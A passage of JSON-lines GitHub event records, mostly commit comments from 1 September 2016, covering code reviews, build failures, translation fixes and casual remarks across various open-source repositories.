Microsoft.SharePoint.Client.UnknownError\\\",\\\"message\\\":{\\\"lang\\\":\\\"en-US\\\",\\\"value\\\":\\\"Unknown Error\\\"}}}\",\"responseJSON\":{\"error\":{\"code\":\"-1, Microsoft.SharePoint.Client.UnknownError\",\"message\":{\"lang\":\"en-US\",\"value\":\"Unknown Error\"}}},\"status\":500,\"statusText\":\"Internal Server Error\"}\r\n\r\nI tried both the following options:\r\n1. Project being checked out\r\n2. Project being checked in\r\n\r\nAppreciate your help. Thanks."}},"created_at":"2016-09-01T11:32:10Z"}
{"id":"4502009035","type":"CommitCommentEvent","actor":{"login":"danachkov"},"repo":{"name":"ilidima/some.original.name"},"payload":{"comment":{"id":18862309,"position":4,"line":4,"path":"README.md","commit_id":"cbe09d8534abe7d9bbc1175b85ef533a981608a7","created_at":"2016-09-01T11:32:12Z","updated_at":"2016-09-01T11:32:12Z","body":"Hi! I am someone who has \"accidentally\" stumbled upon this repository!"}},"created_at":"2016-09-01T11:32:12Z"}
{"id":"4502012077","type":"CommitCommentEvent","actor":{"login":"das-g"},"repo":{"name":"qgis/QGIS-Website"},"payload":{"comment":{"id":18862311,"position":null,"line":null,"path":null,"commit_id":"a1254d424b6c9f32b864faf2567ec4cd733c7d4e","created_at":"2016-09-01T11:32:56Z","updated_at":"2016-09-01T11:32:56Z","body":":+1:\r\n\r\nI was just about to file an issue asking for this, when I saw that the change was already there in the source on GitHub. Had to click \"refresh\" in my browser though for the changed content to become visible on http://qgis.org/en/site/forusers/alldownloads.html#debian-ubuntu :confused: (Maybe the cache TTL is set too high?)"}},"created_at":"2016-09-01T11:32:56Z"}
{"id":"4502012711","type":"CommitCommentEvent","actor":{"login":"danachkov"},"repo":{"name":"ilidima/some.original.name"},"payload":{"comment":{"id":18862312,"position":5,"line":5,"path":"README.md","commit_id":"cbe09d8534abe7d9bbc1175b85ef533a981608a7","created_at":"2016-09-01T11:33:05Z","updated_at":"2016-09-01T11:33:05Z","body":"Me neither!"}},"created_at":"2016-09-01T11:33:05Z"}
{"id":"4502014511","type":"CommitCommentEvent","actor":{"login":"WikiaJenkins"},"repo":{"name":"Wikia/design-system-reference-page"},"payload":{"comment":{"id":18862314,"position":null,"line":null,"path":null,"commit_id":"b0f31b0da51090d07221b5ea2f30e6d62de70144","created_at":"2016-09-01T11:33:33Z","updated_at":"2016-09-01T11:33:33Z","body":"Visual Regression Testing found a difference between new version and the baseline.\nCheck the diffs [here](http://jenkins.wikia-prod:8080/job/design-system-reference-page-pr-check/348/).\nAccept the new baseline [here](http://jenkins.wikia-prod:8080/job/design-system-reference-page-update-baseline/parambuild?branch=XW-1690)."}},"created_at":"2016-09-01T11:33:33Z"}
{"id":"4502016118","type":"CommitCommentEvent","actor":{"login":"danachkov"},"repo":{"name":"ilidima/some.original.name"},"payload":{"comment":{"id":18862317,"position":6,"line":6,"path":"README.md","commit_id":"cbe09d8534abe7d9bbc1175b85ef533a981608a7","created_at":"2016-09-01T11:33:58Z","updated_at":"2016-09-01T11:33:58Z","body":"The most important thing is that you are trying to find out what you are doing!"}},"created_at":"2016-09-01T11:33:58Z"}
{"id":"4502016563","type":"CommitCommentEvent","actor":{"login":"nallath"},"repo":{"name":"Ultimaker/Cura"},"payload":{"comment":{"id":18862318,"position":10,"line":178,"path":"cura/Settings/QualitySettingsModel.py","commit_id":"f85f7cb62c3bab63c983987f248545b01db46524","created_at":"2016-09-01T11:34:04Z","updated_at":"2016-09-01T11:34:04Z","body":"You are right that it can be set globally, but it doesn't matter. If for example only the global stack sets a per_extruder_setting, it's still displayed in both extruders due to the inheritance. It makes more sense to display the value in the extruders as it's an per_extruder setting. "}},"created_at":"2016-09-01T11:34:04Z"}
{"id":"4502017906","type":"CommitCommentEvent","actor":{"login":"Tolo0"},"repo":{"name":"iTXTech/Genisys"},"payload":{"comment":{"id":18862320,"position":null,"line":null,"path":null,"commit_id":"e1f9b947990f0584d4173542c7d2774964a95588","created_at":"2016-09-01T11:34:25Z","updated_at":"2016-09-01T11:34:25Z","body":"get a error from this build...\r\n\r\nDeprecated: Do not attempt to change hotbar links in plugins! in /home/tolo/mc2/src/pocketmine/inventory/PlayerInventory.php on line 102\r\n\r\nDeprecated: Do not attempt to change hotbar links in plugins! in /home/tolo/mc2/src/pocketmine/inventory/PlayerInventory.php on line 102\r\n\r\nDeprecated: Do not attempt to change hotbar links in plugins! in /home/tolo/mc2/src/pocketmine/inventory/PlayerInventory.php on line 102\r\n\r\nDeprecated: Do not attempt to change hotbar links in plugins! in /home/tolo/mc2/src/pocketmine/inventory/PlayerInventory.php on line 102\r\n\r\nDeprecated: Do not attempt to change hotbar links in plugins! in /home/tolo/mc2/src/pocketmine/inventory/PlayerInventory.php on line 102\r\n\r\nDeprecated: Do not attempt to change hotbar links in plugins! in /home/tolo/mc2/src/pocketmine/inventory/PlayerInventory.php on line 102"}},"created_at":"2016-09-01T11:34:25Z"}
{"id":"4502022319","type":"CommitCommentEvent","actor":{"login":"danachkov"},"repo":{"name":"ilidima/some.original.name"},"payload":{"comment":{"id":18862332,"position":null,"line":null,"path":null,"commit_id":"cbe09d8534abe7d9bbc1175b85ef533a981608a7","created_at":"2016-09-01T11:35:29Z","updated_at":"2016-09-01T11:35:29Z","body":"Great start, Dima! Keep on going! :+1: "}},"created_at":"2016-09-01T11:35:29Z"}
{"id":"4502031939","type":"CommitCommentEvent","actor":{"login":"arnasnavikas"},"repo":{"name":"arnasnavikas/test_site"},"payload":{"comment":{"id":18862351,"position":null,"line":null,"path":null,"commit_id":"ed82b4ec96f3dd0e387f22bf59c093a1ce7dcdc7","created_at":"2016-09-01T11:37:54Z","updated_at":"2016-09-01T11:37:54Z","body":"v 1.1"}},"created_at":"2016-09-01T11:37:54Z"}
{"id":"4502035295","type":"CommitCommentEvent","actor":{"login":"fluke1030"},"repo":{"name":"donus3/High"},"payload":{"comment":{"id":18862354,"position":null,"line":null,"path":null,"commit_id":"9f09e8e40e1e6cecb0cc34b3edfa419ad9fc898c","created_at":"2016-09-01T11:38:42Z","updated_at":"2016-09-01T11:38:42Z","body":"add login page w/o the api and link to register page"}},"created_at":"2016-09-01T11:38:42Z"}
{"id":"4502038097","type":"CommitCommentEvent","actor":{"login":"kbence"},"repo":{"name":"prezi/ivy-wrapper"},"payload":{"comment":{"id":18862358,"position":13,"line":46,"path":"ivy","commit_id":"0a8409e17157f2987790b499a8a453bfce2248b9","created_at":"2016-09-01T11:39:25Z","updated_at":"2016-09-01T11:39:25Z","body":"Can we not pass this when it's empty and make `java` to think we are overriding the Main-Class with `\"\"` resulting in a `Could not find or load main class`? Thanks!"}},"created_at":"2016-09-01T11:39:25Z"}
{"id":"4502039911","type":"CommitCommentEvent","actor":{"login":"WikiaJenkins"},"repo":{"name":"Wikia/design-system-reference-page"},"payload":{"comment":{"id":18862360,"position":null,"line":null,"path":null,"commit_id":"885614b238082a92fbc7d2085752c939276bb938","created_at":"2016-09-01T11:39:50Z","updated_at":"2016-09-01T11:39:50Z","body":"Visual Regression Testing found a difference between new version and the baseline.\nCheck the diffs [here](http://jenkins.wikia-prod:8080/job/design-system-reference-page-pr-check/349/).\nAccept the new baseline [here](http://jenkins.wikia-prod:8080/job/design-system-reference-page-update-baseline/parambuild?branch=XW-1690)."}},"created_at":"2016-09-01T11:39:50Z"}
{"id":"4502041477","type":"CommitCommentEvent","actor":{"login":"tivisse"},"repo":{"name":"odoo/odoo"},"payload":{"comment":{"id":18862365,"position":null,"line":null,"path":null,"commit_id":"abc7d83ea64c621a41a80f39e9ae28fff440ee48","created_at":"2016-09-01T11:40:15Z","updated_at":"2016-09-01T11:40:15Z","body":"Don't forget that @mart-e did nothing :postal_horn: "}},"created_at":"2016-09-01T11:40:15Z"}
{"id":"4502046157","type":"CommitCommentEvent","actor":{"login":"kbence"},"repo":{"name":"prezi/ivy-wrapper"},"payload":{"comment":{"id":18862372,"position":13,"line":46,"path":"ivy","commit_id":"0a8409e17157f2987790b499a8a453bfce2248b9","created_at":"2016-09-01T11:41:24Z","updated_at":"2016-09-01T11:41:24Z","body":"Btw, do we actually need those `\"`s?"}},"created_at":"2016-09-01T11:41:24Z"}
{"id":"4502047566","type":"CommitCommentEvent","actor":{"login":"lilolima"},"repo":{"name":"lilolima/Sistema-Cabeleleiro"},"payload":{"comment":{"id":18862375,"position":null,"line":null,"path":null,"commit_id":"4ddd38c10ecb2715492f50e1a56291f1fe195b5b","created_at":"2016-09-01T11:41:46Z","updated_at":"2016-09-01T11:41:46Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;E1STyjCQ&#x2F;1-diagrama-de-classe\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> Diagrama de Classe</a>"}},"created_at":"2016-09-01T11:41:46Z"}
{"id":"4502048678","type":"CommitCommentEvent","actor":{"login":"florentdestremau"},"repo":{"name":"windoo/app"},"payload":{"comment":{"id":18862377,"position":null,"line":null,"path":null,"commit_id":"41935024d48b3edf666441fadce14f6b9a838c15","created_at":"2016-09-01T11:42:03Z","updated_at":"2016-09-01T11:42:03Z","body":"Soon :)"}},"created_at":"2016-09-01T11:42:03Z"}
{"id":"4502051815","type":"CommitCommentEvent","actor":{"login":"willj"},"repo":{"name":"willj/jsconsole"},"payload":{"comment":{"id":18862381,"position":null,"line":null,"path":null,"commit_id":"6be3fb474c73a1036286364368434936fd3636f1","created_at":"2016-09-01T11:42:47Z","updated_at":"2016-09-01T11:42:47Z","body":"Now jsconsole.com will only load over https the `substr(7)` only matched `https:/` leaving `/jsconsole.com...` resulting in the iframe pointing at `http:///remote.html`\r\n\r\nThis fix uses the protocol of `lastsrc` rather than the current document, and works on both http and https"}},"created_at":"2016-09-01T11:42:47Z"}
{"id":"4502058644","type":"CommitCommentEvent","actor":{"login":"AakaFosfor"},"repo":{"name":"CMCRobotics/inmoov-cmc"},"payload":{"comment":{"id":18862400,"position":null,"line":null,"path":null,"commit_id":"9aec6573472c4187f51267913923516a0e271a72","created_at":"2016-09-01T11:44:31Z","updated_at":"2016-09-01T11:44:31Z","body":"Hi, code works - there were just few typos or forgotten \"self.\".\r\n\r\nI think it would be nice to have separate fingers (or \"joints\"? \"servos\"? as there is wrist, there will be an elbow ...) constants (some enums) and than some mapping to the actual boards/hats/channels. I tried to outline this approach in my commit but it will need little bit more thinking when new servos will pop-up."}},"created_at":"2016-09-01T11:44:31Z"}
{"id":"4502059902","type":"CommitCommentEvent","actor":{"login":"guparan"},"repo":{"name":"sofa-framework/sofa"},"payload":{"comment":{"id":18862405,"position":null,"line":null,"path":null,"commit_id":"44cf001a1fe1f1a2d081049920940f4cde4a2c6d","created_at":"2016-09-01T11:44:49Z","updated_at":"2016-09-01T11:44:49Z","body":"**Warning**: writing `#2` in commit message makes a reference to an issue."}},"created_at":"2016-09-01T11:44:49Z"}
{"id":"4502062135","type":"CommitCommentEvent","actor":{"login":"MajorPlayz"},"repo":{"name":"MajorPlayz/MagicWE"},"payload":{"comment":{"id":18862410,"position":null,"line":null,"path":null,"commit_id":"939c28449feb1b150e579f47afe9336cfd64c4ec","created_at":"2016-09-01T11:45:22Z","updated_at":"2016-09-01T11:45:22Z","body":"Very poor what I did but to be honest, MagicWE is almost perfect so I don't really have that much to change!\r\n\r\nGG @thebigsmileXD"}},"created_at":"2016-09-01T11:45:22Z"}
{"id":"4502064712","type":"CommitCommentEvent","actor":{"login":"wolfs"},"repo":{"name":"gradle/gradle"},"payload":{"comment":{"id":18862413,"position":17,"line":32,"path":"subprojects/logging/src/integTest/groovy/org/gradle/DeprecationHandlingIntegrationTest.groovy","commit_id":"486fc4d5eebc45e95582910f3f66e22664752218","created_at":"2016-09-01T11:45:59Z","updated_at":"2016-09-01T11:45:59Z","body":"Should already be fixed."}},"created_at":"2016-09-01T11:45:59Z"}
{"id":"4502065369","type":"CommitCommentEvent","actor":{"login":"ewnd9"},"repo":{"name":"ewnd9/procrastin8"},"payload":{"comment":{"id":18862415,"position":null,"line":null,"path":null,"commit_id":"c51c39180124d9d43b7c27431336caa2a15e9959","created_at":"2016-09-01T11:46:11Z","updated_at":"2016-09-01T11:46:11Z","body":"`removeListner` is alright, there were always new functions, to correctly fixed that I should have made bound instances of `checkTab` and `checkUpdatedTab` with the local variables and remove them on a reload request"}},"created_at":"2016-09-01T11:46:11Z"}
{"id":"4502071698","type":"CommitCommentEvent","actor":{"login":"alexlehm"},"repo":{"name":"eclipse/vert.x"},"payload":{"comment":{"id":18862438,"position":null,"line":null,"path":null,"commit_id":"89715bf17e3b4caf540653fe4287bb864872de0e","created_at":"2016-09-01T11:47:45Z","updated_at":"2016-09-01T11:47:45Z","body":"If cause can be null, this will give a NPE on cause.printStackTrace\r\nif not null it is printed in stdout, which is probably not intended\r\n"}},"created_at":"2016-09-01T11:47:45Z"}
{"id":"4502076012","type":"CommitCommentEvent","actor":{"login":"vietj"},"repo":{"name":"eclipse/vert.x"},"payload":{"comment":{"id":18862451,"position":null,"line":null,"path":null,"commit_id":"89715bf17e3b4caf540653fe4287bb864872de0e","created_at":"2016-09-01T11:48:51Z","updated_at":"2016-09-01T11:48:51Z","body":"forgot that tahnks"}},"created_at":"2016-09-01T11:48:51Z"}
{"id":"4502077687","type":"CommitCommentEvent","actor":{"login":"ebassi"},"repo":{"name":"mvaello/gnome-dictionary"},"payload":{"comment":{"id":18862455,"position":98,"line":363,"path":"libgdict/gdict-database-chooser.c","commit_id":"af0696f9a76a92fe89204c7cf2e54832f817d84c","created_at":"2016-09-01T11:49:16Z","updated_at":"2016-09-01T11:49:16Z","body":"Instead of calling `gtk_widget_get_style_context()` twice, declare a new `GtkStyleContext` variable and call it once."}},"created_at":"2016-09-01T11:49:16Z"}
{"id":"4502078800","type":"CommitCommentEvent","actor":{"login":"ebassi"},"repo":{"name":"mvaello/gnome-dictionary"},"payload":{"comment":{"id":18862458,"position":99,"line":364,"path":"libgdict/gdict-database-chooser.c","commit_id":"af0696f9a76a92fe89204c7cf2e54832f817d84c","created_at":"2016-09-01T11:49:32Z","updated_at":"2016-09-01T11:49:32Z","body":"Please, put the class argument on the same line."}},"created_at":"2016-09-01T11:49:32Z"}
{"id":"4502079300","type":"CommitCommentEvent","actor":{"login":"ebassi"},"repo":{"name":"mvaello/gnome-dictionary"},"payload":{"comment":{"id":18862459,"position":101,"line":366,"path":"libgdict/gdict-database-chooser.c","commit_id":"af0696f9a76a92fe89204c7cf2e54832f817d84c","created_at":"2016-09-01T11:49:39Z","updated_at":"2016-09-01T11:49:39Z","body":"Same as above."}},"created_at":"2016-09-01T11:49:39Z"}
{"id":"4502080487","type":"CommitCommentEvent","actor":{"login":"anyxem"},"repo":{"name":"FrontendSimf20016/team2"},"payload":{"comment":{"id":18862462,"position":null,"line":null,"path":null,"commit_id":"76549e396cf9e62dbe27075f2a6c3ecc01282cc9","created_at":"2016-09-01T11:49:56Z","updated_at":"2016-09-01T11:49:56Z","body":"Может не писать шрифты в блоках? Пусть только в .page будет, так он везде сам появится"}},"created_at":"2016-09-01T11:49:56Z"}
{"id":"4502080821","type":"CommitCommentEvent","actor":{"login":"lekma"},"repo":{"name":"lekma/tvheadend"},"payload":{"comment":{"id":18862465,"position":null,"line":null,"path":null,"commit_id":"06207f2eb2d175d17f8949888654b388002b02f3","created_at":"2016-09-01T11:50:01Z","updated_at":"2016-09-01T11:50:01Z","body":"no. you seem to be confused about the whole thing. the logs you attached are good. they show you using vaapi for decode and encode. intel_gpu_top will show NO activity if you weren't using vaapi. I'm guessing the first numbers are with hw accel (decode) and the second with h264_vaapi (encode). to see what happens without vaapi use libx264 and _uncheck_ 'Hardware acceleration' in the codec profile.\r\n\r\nagain as far as i can tell everything is fine so if there is something that is a pb i don't get it.\r\n\r\n(side note: this is not full vaapi, scaling and deinterlacing are still done in sw, I intend to write a deint_vaapi filter if nobody gets to it before me, but that is another subject for another time.)\r\n\r\n(also you might have misread cpu as gpu in my previous post)"}},"created_at":"2016-09-01T11:50:01Z"}
{"id":"4502082990","type":"CommitCommentEvent","actor":{"login":"ebassi"},"repo":{"name":"mvaello/gnome-dictionary"},"payload":{"comment":{"id":18862470,"position":null,"line":null,"path":null,"commit_id":"af0696f9a76a92fe89204c7cf2e54832f817d84c","created_at":"2016-09-01T11:50:33Z","updated_at":"2016-09-01T11:50:33Z","body":"As a general coding and commit style: you should avoid whitespace changes on lines you did not modify. They make `git blame` harder to follow, and they make patches harder to read."}},"created_at":"2016-09-01T11:50:33Z"}
{"id":"4502086529","type":"CommitCommentEvent","actor":{"login":"vy4eslavik"},"repo":{"name":"FrontendSimf20016/team2"},"payload":{"comment":{"id":18862484,"position":null,"line":null,"path":null,"commit_id":"76549e396cf9e62dbe27075f2a6c3ecc01282cc9","created_at":"2016-09-01T11:51:26Z","updated_at":"2016-09-01T11:51:26Z","body":"А там где не появится просто наследовать от родителя."}},"created_at":"2016-09-01T11:51:26Z"}
{"id":"4502087948","type":"CommitCommentEvent","actor":{"login":"mikewest"},"repo":{"name":"httpwg/http-extensions"},"payload":{"comment":{"id":18862488,"position":null,"line":null,"path":null,"commit_id":"3f58813b120dbedcf78d0df899b5a74e095fd068","created_at":"2016-09-01T11:51:49Z","updated_at":"2016-09-01T11:51:49Z","body":"This patch broke the Travis build. `make cookie-alone` succeeds locally, and nothing in the diff jumps out at me as being particularly confusing for the various scripts. Looking into it."}},"created_at":"2016-09-01T11:51:49Z"}
{"id":"4502088162","type":"CommitCommentEvent","actor":{"login":"tonioo"},"repo":{"name":"modoboa/modoboa-pfxadmin-migrate"},"payload":{"comment":{"id":18862489,"position":null,"line":null,"path":null,"commit_id":"0784ae3757ee9f6be56f15dc60874e992a911c14","created_at":"2016-09-01T11:51:52Z","updated_at":"2016-09-01T11:51:52Z","body":"That's strange. What version of Django is installed on your server ?"}},"created_at":"2016-09-01T11:51:52Z"}
{"id":"4502088261","type":"CommitCommentEvent","actor":{"login":"drakosha"},"repo":{"name":"danieleds/exceljs"},"payload":{"comment":{"id":18862490,"position":14,"line":256,"path":"lib/stream/xlsx/workbook-writer.js","commit_id":"d5011ba46c5192942d1aa7aa6790a2a0459b54e3","created_at":"2016-09-01T11:51:54Z","updated_at":"2016-09-01T11:51:54Z","body":"May be it should be moved to sharedString.xml getter?"}},"created_at":"2016-09-01T11:51:54Z"}
{"id":"4502091268","type":"CommitCommentEvent","actor":{"login":"copumpkin"},"repo":{"name":"NixOS/nixpkgs"},"payload":{"comment":{"id":18862497,"position":null,"line":null,"path":null,"commit_id":"0c3b1112afe3c9231db2498f913c9b2bcf90a5b4","created_at":"2016-09-01T11:52:37Z","updated_at":"2016-09-01T11:52:37Z","body":"@FRidh wouldn't the right thing to do there be to either patch python to refer to an absolute path, or to add `less` to a wrapper `PATH`? Propagating it feels a little awkward."}},"created_at":"2016-09-01T11:52:37Z"}
{"id":"4502091966","type":"CommitCommentEvent","actor":{"login":"naren-eindhan"},"repo":{"name":"naren-eindhan/naren1"},"payload":{"comment":{"id":18862500,"position":null,"line":null,"path":null,"commit_id":"22ff6fb6f79ed68b6d6a80cd3ceccdcb82baae05","created_at":"2016-09-01T11:52:49Z","updated_at":"2016-09-01T11:52:49Z","body":"hi this is naren creating newer file for checking purpose."}},"created_at":"2016-09-01T11:52:49Z"}
{"id":"4502094277","type":"CommitCommentEvent","actor":{"login":"mikewest"},"repo":{"name":"httpwg/http-extensions"},"payload":{"comment":{"id":18862505,"position":null,"line":null,"path":null,"commit_id":"3f58813b120dbedcf78d0df899b5a74e095fd068","created_at":"2016-09-01T11:53:23Z","updated_at":"2016-09-01T11:53:23Z","body":"Actually, looking at the log (https://travis-ci.org/httpwg/http-extensions/jobs/156785575) again, it's failing to build client hints (which, via `make client-hints`, works for me locally as well). :/"}},"created_at":"2016-09-01T11:53:23Z"}
{"id":"4502096423","type":"CommitCommentEvent","actor":{"login":"gdelhumeau"},"repo":{"name":"xwiki/xwiki-platform"},"payload":{"comment":{"id":18862512,"position":6,"line":269,"path":"xwiki-platform-core/xwiki-platform-flamingo/xwiki-platform-flamingo-skin/xwiki-platform-flamingo-skin-resources/src/main/resources/flamingo/copy.vm","commit_id":"b02aa93cd25d53d16ec1abb37fa63cd21daad380","created_at":"2016-09-01T11:53:54Z","updated_at":"2016-09-01T11:53:54Z","body":"From `xwikivars.vm`, I can see:\r\n```\r\n#set ($hasCreatePage = $services.security.authorization.hasAccess('edit', $services.model.resolveSpace('')))\r\n```\r\nIt means that now we requires EDIT rights on the space. I don't know if it's better than before. We shoulder either no right (for the reasons described in http://jira.xwiki.org/browse/XWIKI-12931) or at the wiki level (but it leads me to create http://jira.xwiki.org/browse/XWIKI-12937 that you have closed as a duplicate)."}},"created_at":"2016-09-01T11:53:54Z"}
{"id":"4502097007","type":"CommitCommentEvent","actor":{"login":"traversaro"},"repo":{"name":"robotology/yarp"},"payload":{"comment":{"id":18862518,"position":null,"line":null,"path":null,"commit_id":"601ba33b8ac65caa068e8cf406f916d803826f1c","created_at":"2016-09-01T11:54:03Z","updated_at":"2016-09-01T11:54:03Z","body":"@lornat75 I moved your commit to the `cleanup-gsl` branch."}},"created_at":"2016-09-01T11:54:03Z"}
{"id":"4502097343","type":"CommitCommentEvent","actor":{"login":"nicolabeghin"},"repo":{"name":"ArthurHub/Android-Image-Cropper"},"payload":{"comment":{"id":18862521,"position":null,"line":null,"path":null,"commit_id":"59487fc1a5b5932fdfa92228cb297e615fde54e1","created_at":"2016-09-01T11:54:09Z","updated_at":"2016-09-01T11:54:09Z","body":"Just to understand, why the last intent and not the first one? "}},"created_at":"2016-09-01T11:54:09Z"}
{"id":"4502099441","type":"CommitCommentEvent","actor":{"login":"aethaniel"},"repo":{"name":"luc-github/ExperimentalCore-sam"},"payload":{"comment":{"id":18862527,"position":65,"line":79,"path":"module/variants/atmel_sam4e_xplained_pro/variant.cpp","commit_id":"f125d92fbd83e3ca86872180398cc375887637cd","created_at":"2016-09-01T11:54:35Z","updated_at":"2016-09-01T11:54:35Z","body":"should be USART/RTS1 PWM/PWMH1 SMC/A20 PIO/PIODC0\r\nsame for all other similar lines"}},"created_at":"2016-09-01T11:54:35Z"}
{"id":"4502101980","type":"CommitCommentEvent","actor":{"login":"matthewelse"},"repo":{"name":"ARMmbed/jerryscript"},"payload":{"comment":{"id":18862534,"position":null,"line":null,"path":null,"commit_id":"da6619977ecc319dd48675fee7a9dc3b985d1671","created_at":"2016-09-01T11:55:10Z","updated_at":"2016-09-01T11:55:10Z","body":"@polaroi8d no worries :)"}},"created_at":"2016-09-01T11:55:10Z"}
{"id":"4502102544","type":"CommitCommentEvent","actor":{"login":"dktapps"},"repo":{"name":"iTXTech/Genisys"},"payload":{"comment":{"id":18862537,"position":null,"line":null,"path":null,"commit_id":"e1f9b947990f0584d4173542c7d2774964a95588","created_at":"2016-09-01T11:55:15Z","updated_at":"2016-09-01T11:55:15Z","body":"Read the error and stop spamming."}},"created_at":"2016-09-01T11:55:15Z"}
{"id":"4502104635","type":"CommitCommentEvent","actor":{"login":"ZollnaPa"},"repo":{"name":"IBMStreams/streamsx.tutorial.teda"},"payload":{"comment":{"id":18862540,"position":null,"line":null,"path":null,"commit_id":"397ace572af3b40389bf96bdc94793f21cfa6002","created_at":"2016-09-01T11:55:43Z","updated_at":"2016-09-01T11:55:43Z","body":"Update for following chapter 11"}},"created_at":"2016-09-01T11:55:43Z"}
{"id":"4502106059","type":"CommitCommentEvent","actor":{"login":"HybridDog"},"repo":{"name":"minetest/minetest"},"payload":{"comment":{"id":18862544,"position":54,"line":1141,"path":"src/content_mapblock.cpp","commit_id":"e58a55aa82dfc66325a694dcc3519d3c0f3388a6","created_at":"2016-09-01T11:56:02Z","updated_at":"2016-09-01T11:56:02Z","body":"@sofar degrotate is broken now:\r\n![screenshot_20160901_135009](https://cloud.githubusercontent.com/assets/3192173/18166489/c2135f5e-704b-11e6-8303-11d478c3ecd8.png)\r\nl assume here shouldn't be an else"}},"created_at":"2016-09-01T11:56:02Z"}
{"id":"4502107086","type":"CommitCommentEvent","actor":{"login":"pi408637535"},"repo":{"name":"edzob/scribe-java"},"payload":{"comment":{"id":18862549,"position":null,"line":null,"path":null,"commit_id":"7a8fb7edbefd5e8cdf49d718e1d63eb0400998b5","created_at":"2016-09-01T11:56:17Z","updated_at":"2016-09-01T11:56:17Z","body":"I download this project.But I don't find out \".provider(TwitterApi.SSL.class) \". I'm very doubt how you solve the  issue \"Could not authenticate you. 302\""}},"created_at":"2016-09-01T11:56:17Z"}
{"id":"4502107503","type":"CommitCommentEvent","actor":{"login":"mikewest"},"repo":{"name":"httpwg/http-extensions"},"payload":{"comment":{"id":18862552,"position":null,"line":null,"path":null,"commit_id":"3f58813b120dbedcf78d0df899b5a74e095fd068","created_at":"2016-09-01T11:56:22Z","updated_at":"2016-09-01T11:56:22Z","body":"@reschke, any ideas?"}},"created_at":"2016-09-01T11:56:22Z"}
{"id":"4502109024","type":"CommitCommentEvent","actor":{"login":"hotta"},"repo":{"name":"laravel-ja/comja5"},"payload":{"comment":{"id":18862554,"position":null,"line":null,"path":null,"commit_id":"fc97f058d027bcc6b76edd185e1df9de2dd1acf4","created_at":"2016-09-01T11:56:43Z","updated_at":"2016-09-01T11:56:43Z","body":"素早いご対応ありがとうございます。次回からは issue でご報告するようにします！"}},"created_at":"2016-09-01T11:56:43Z"}
{"id":"4502109652","type":"CommitCommentEvent","actor":{"login":"jorfer07"},"repo":{"name":"ThalesEu/ThalesComercio1"},"payload":{"comment":{"id":18862560,"position":null,"line":null,"path":null,"commit_id":"df3146069f79e2e71d623c985eac5a3067e6ebde","created_at":"2016-09-01T11:56:52Z","updated_at":"2016-09-01T11:56:52Z","body":"lesgau fera \r\n\r\n> a vingança nunca é plena mata a alma e envenena\r\n\r\n>  -_**Seu madruga**-2010_ "}},"created_at":"2016-09-01T11:56:52Z"}
{"id":"4502112192","type":"CommitCommentEvent","actor":{"login":"Romathonat"},"repo":{"name":"occiware/OCCInterface"},"payload":{"comment":{"id":18862567,"position":null,"line":null,"path":null,"commit_id":"8fbaf88dff844f73b35f6f297828ea598a40bd25","created_at":"2016-09-01T11:57:31Z","updated_at":"2016-09-01T11:57:31Z","body":"Are you sure about it? I changed it because in bash ./ is not relative to the file but to the location you are running the script ! It is called in Makefile, so it makes sense, I tested it and it worked."}},"created_at":"2016-09-01T11:57:31Z"}
{"id":"4502113384","type":"CommitCommentEvent","actor":{"login":"dyemanov"},"repo":{"name":"FirebirdSQL/firebird"},"payload":{"comment":{"id":18862570,"position":50,"line":52,"path":"CHANGELOG.md","commit_id":"a80e0b07d200d790af3cb0cd3471042efab196b2","created_at":"2016-09-01T11:57:49Z","updated_at":"2016-09-01T11:57:49Z","body":"My fault, I forgot PR by Hajime Nakagami. He should definitely be added here."}},"created_at":"2016-09-01T11:57:49Z"}
{"id":"4502114232","type":"CommitCommentEvent","actor":{"login":"aethaniel"},"repo":{"name":"luc-github/ExperimentalCore-sam"},"payload":{"comment":{"id":18862573,"position":19,"line":57,"path":"module/variants/atmel_sam4e_xplained_pro/variant.h","commit_id":"f125d92fbd83e3ca86872180398cc375887637cd","created_at":"2016-09-01T11:58:03Z","updated_at":"2016-09-01T11:58:03Z","body":"(4ul) -> EXT1/3-4 and EXT3/3-4 -> AFE1/AD0, AFE1/AD1, AFE0/AD0, AFE0/AD6"}},"created_at":"2016-09-01T11:58:03Z"}
{"id":"4502114444","type":"CommitCommentEvent","actor":{"login":"ArthurHub"},"repo":{"name":"ArthurHub/Android-Image-Cropper"},"payload":{"comment":{"id":18862574,"position":null,"line":null,"path":null,"commit_id":"59487fc1a5b5932fdfa92228cb297e615fde54e1","created_at":"2016-09-01T11:58:06Z","updated_at":"2016-09-01T11:58:06Z","body":"On vanilla Android the target intent will be the last intent in the picker.\r\nThe first intent in the list is the camera, I think it is better then camera is first followed by all possible gallery intents."}},"created_at":"2016-09-01T11:58:06Z"}
{"id":"4502118625","type":"CommitCommentEvent","actor":{"login":"hnakamur"},"repo":{"name":"tenforward/lxd"},"payload":{"comment":{"id":18862584,"position":367,"line":652,"path":"po/ja.po","commit_id":"ef67e7f104e5b5386593f2bc9f9ff0ef6af1e992","created_at":"2016-09-01T11:59:03Z","updated_at":"2016-09-01T11:59:03Z","body":"Commas between consecutive shorthand chars are optional.\r\nに対応する訳が抜けていますね。\r\n「連続する短縮形の間のコンマは省略可能です。」とかでしょうか。\r\nこれってコンマは省略するけど空白で区切るってことなんですかね？"}},"created_at":"2016-09-01T11:59:03Z"}
{"id":"4502119111","type":"CommitCommentEvent","actor":{"login":"lucabrivio"},"repo":{"name":"snicolet/Stockfish"},"payload":{"comment":{"id":18862588,"position":null,"line":null,"path":null,"commit_id":"ab3dde3206e22977c5828174ead814bcd4066d9e","created_at":"2016-09-01T11:59:10Z","updated_at":"2016-09-01T11:59:10Z","body":"@snicolet Perhaps open_files() might serve for a small midgame penalty for bishops..."}},"created_at":"2016-09-01T11:59:10Z"}
{"id":"4502121380","type":"CommitCommentEvent","actor":{"login":"BluSunrize"},"repo":{"name":"BluSunrize/ImmersiveEngineering"},"payload":{"comment":{"id":18862591,"position":null,"line":null,"path":null,"commit_id":"e78132415d7a78cfb5c480626d08efd26600ac18","created_at":"2016-09-01T11:59:41Z","updated_at":"2016-09-01T11:59:41Z","body":"Pretty sure that method is still in 1.8 though, so that'll probably cause issues too"}},"created_at":"2016-09-01T11:59:41Z"}
